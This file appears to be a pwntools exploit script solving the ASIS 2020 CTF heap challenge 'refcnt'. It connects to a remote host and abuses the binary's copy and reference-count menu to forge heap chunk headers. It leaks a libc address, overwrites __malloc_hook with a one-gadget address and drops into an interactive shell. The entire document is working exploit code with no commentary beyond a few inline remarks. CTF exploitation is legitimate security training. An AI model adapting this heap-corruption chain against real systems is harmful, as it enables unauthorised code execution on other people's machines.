ASIS_2020/refcnt/xpl.py

#!/usr/bin/env python3
from pwn import *

context.terminal = ["tmux", "sp", "-h"]
#context.log_level = "debug"

chall = ELF("./chall", checksec=False)
libc = ELF("./libc.so.6", checksec=False)

def alloc(idx, size):
    io.sendlineafter("Choice:", "1")
    io.sendlineafter("Index:", str(idx))
    io.sendlineafter("Size:", str(size))

def edit(idx, data):
    io.sendlineafter("Choice:", "2")
    io.sendlineafter("Index:", str(idx))
    io.sendafter("Data:", data)

def show(idx):
    io.sendlineafter("Choice:", "4")
    io.sendlineafter("Index:", str(idx))

def copy(frm, to):
    io.sendlineafter("Choice:", "3")
    io.sendlineafter("From:", str(frm))
    io.sendlineafter("To:", str(to))

def delete(idx):
    io.sendlineafter("Choice:", "5")
    io.sendlineafter("Index:", str(idx))

io = remote("69.90.132.248", 1337)

alloc(0, 0x90)

copy(0, 0)
edit(0, "A" * 8)
copy(0, 0)

alloc(1, 0x90)
alloc(2, 0x90)

copy(2, 3)
edit(1, p8(0) * 0x0 + p64(0x51))

alloc(0, 0x40)
alloc(4, 0x40)

edit(2, p8(0) * 0x8f + p8(0xf1))
alloc(0, 0xe0)

fake_chunk = p64(0) + p64(0xf1)
fake_chunk += p64(0x1) + p64(0)

for _ in range(7):
    edit(0, p8(0) * 0x38 + fake_chunk)
    copy(4, 4)

alloc(1, 0xf0)      # Fix next chunk
edit(1, p8(0) * 0x90 + p64(0x61))

edit(0, p8(0) * 0x38 + fake_chunk)
copy(4, 4)

edit(0, "A" * 0x48)
show(0)

io.recvuntil("A" * 0x48)
leaked_libc = u64(io.recvuntil("\n", drop = True).ljust(8, b"\x00"))
libc.address = leaked_libc - 0x1ebbe1

log.success("Leaked GLIBC address: " + hex(leaked_libc))
log.info("GLIBC base address: " + hex(libc.address))

fake_chunk = p64(0) + p64(0x51)
fake_chunk += p64(0x1) + p64(0)

edit(0, p8(0) * 0x38 + fake_chunk)
copy(4, 4)

fake_chunk = p64(0) + p64(0x51)
fake_chunk += p64(0x1) + p64(0)

edit(0, p8(0) * 0x38 + fake_chunk)
copy(4, 4)

fake_chunk = p64(0) + p64(0x51)
fake_chunk += p64(libc.sym["__malloc_hook"] - 0x8) + p64(0)

edit(0, p8(0) * 0x38 + fake_chunk)
copy(4, 4)

alloc(1, 0x40)

fake_chunk = p64(0) + p64(0x51)
fake_chunk += p64(0x2) + p64(0)

edit(0, p8(0) * 0x38 + fake_chunk)

alloc(2, 0x40)
edit(2, p64(libc.address + 0xe6c7e))

alloc(1, 0)

io.interactive()
io.close()